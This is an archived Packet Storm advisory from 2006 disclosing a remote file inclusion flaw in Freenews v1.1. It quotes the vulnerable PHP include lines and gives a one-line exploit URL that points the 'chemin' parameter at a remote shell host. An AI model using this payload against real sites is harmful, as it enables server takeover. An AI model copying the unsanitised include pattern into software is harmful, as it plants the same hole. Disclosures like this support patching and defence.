freenews11-rfi.txt

2006-10-09T00:00:00
ID PACKETSTORM:50734
Type packetstorm
Reporter XORON
Modified 2006-10-09T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Freenews v1.1 <= (chemin) Remote File Include Vulnerability  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Discovered by XORON(turkish hacker)  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
URL:  
http://membres.lycos.fr/fdproweb/fdproweb/php_scripts/freenews1_1.zip  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
CODE:  
  
include ("$chemin/moteur/moteur_form.php");  
include ("$chemin/moteur/moteur_tab_results.php");  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Exploit:  
  
http://www.hedef.com/[freenews_path]/moteur/moteur.php?chemin=http://sh3LL?  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,DJR  
  
www.cyber-warrior.org  
www.team-rootshell.com  
irc.milw0rm.com #rootshell  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
`